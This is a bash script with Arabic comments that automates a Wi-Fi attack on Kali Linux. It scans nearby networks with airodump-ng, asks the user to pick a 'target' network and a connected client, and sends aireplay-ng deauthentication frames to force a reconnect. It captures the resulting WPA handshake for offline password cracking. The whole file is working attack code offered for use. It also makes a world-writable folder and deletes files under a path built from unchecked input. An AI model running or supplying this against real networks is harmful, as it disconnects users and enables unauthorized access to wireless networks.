#!/bin/bash

YELLOW='\033[1;33m'
RED='\033[31m'
GREEN='\033[32m'

NC='\033[0m'

read -p "$(echo -e "${YELLOW} enter your username on kali is : ${NC}")" username
mkdir -m 777 /home/$username/Desktop/wifi

Directory="/home/$username/Desktop/wifi"
OUTPUT_FILE="${Directory}/handshake"

aireplay-ng --test wlan1


# تشغيل airodump-ng وحفظ النتائج في ملف CSV
airodump-ng wlan1 -w $OUTPUT_FILE --output-format csv

# تحويل نتائج CSV إلى نص بسيط
awk -F',' 'NR > 2 && NF > 14 {print NR-2 ": " "SSID: " $14 ", BSSID: " $1 ", Channel: " $4 ", Signal: " $9}' ${OUTPUT_FILE}-01.csv > ${OUTPUT_FILE}.txt

echo " "
echo " "
echo -e "${GREEN} this is available network${NC}"

# قراءة البيانات من الملف واستخدام grep و awk لترتيب البيانات
cat ${OUTPUT_FILE}.txt |  grep -E "SSID|BSSID|Channel" | awk -F", " '{
    split($1, a, ": "); ssid = a[3]; 
    split($2, b, ": "); bssid = b[2]; 
    split($3, c, ": "); channel = c[2]; 
    printf "%d: SSID: %-10s BSSID: %-20s Channel: %s\n", NR, ssid, bssid, channel
}'


# مطالبة المستخدم باختيار الشبكة
read -p "$(echo -e "${RED} enter your target is :${NC}")" network_number


# استخراج BSSID والقناة للشبكة المختارة
BSSID=$(awk -F',' -v num=$network_number 'NR == num+2 {print $1}' ${OUTPUT_FILE}-01.csv)
CHANNEL=$(awk -F',' -v num=$network_number 'NR == num+2 {print $4}' ${OUTPUT_FILE}-01.csv)

echo " "
echo "Selected Network:"
echo " "
echo "BSSID: $BSSID, Channel: $CHANNEL"

# تشغيل airodump-ng لاستهداف الشبكة المختارة وجمع معلومات العملاء المتصلين
airodump-ng --bssid $BSSID --channel $CHANNEL --write ${OUTPUT_FILE}_handshake wlan1 

# عرض قائمة المستخدمين المتصلين وتخزينها في ملف نصي
awk -F',' 'NR > 2 && NF > 6 {print NR-2 ": " "Client MAC: " $1}' ${OUTPUT_FILE}-01.csv > ${OUTPUT_FILE}_clients.txt

echo "Connected clients:"
echo " "
cat ${OUTPUT_FILE}_clients.txt

# مطالبة المستخدم باختيار العميل
read -p "$(echo -e "${YELLOW} enter client number is : ${NC}")"  client_number

# استخراج MAC العميل المختار
CLIENT_MAC=$(awk -F',' -v num=$client_number 'NR == num+2 {print $1}' ${OUTPUT_FILE}-01.csv)

echo -e "${GREEN}client MAC is : $CLIENT_MAC${NC}"


rm -r /home/$username/Desktop/wifi/*

command1="airodump-ng --bssid $BSSID --channel $CHANNEL --write ${OUTPUT_FILE}_handshake wlan1 &"

# الأمر الثاني (aireplay-ng)
command2="aireplay-ng --deauth 5  -a $BSSID -c $CLIENT_MAC wlan1 &"


eval "$command1"

eval "$command2"

sleep 12

# قتل العمليتين
echo "Killing airodump-ng process..."
pkill -f "airodump-ng"

echo "Killing aireplay-ng process..."
pkill -f "aireplay-ng"

echo -e "${GREEN} your handshanke was saved in /home/$username/Desktop/wifi  ${NC}"
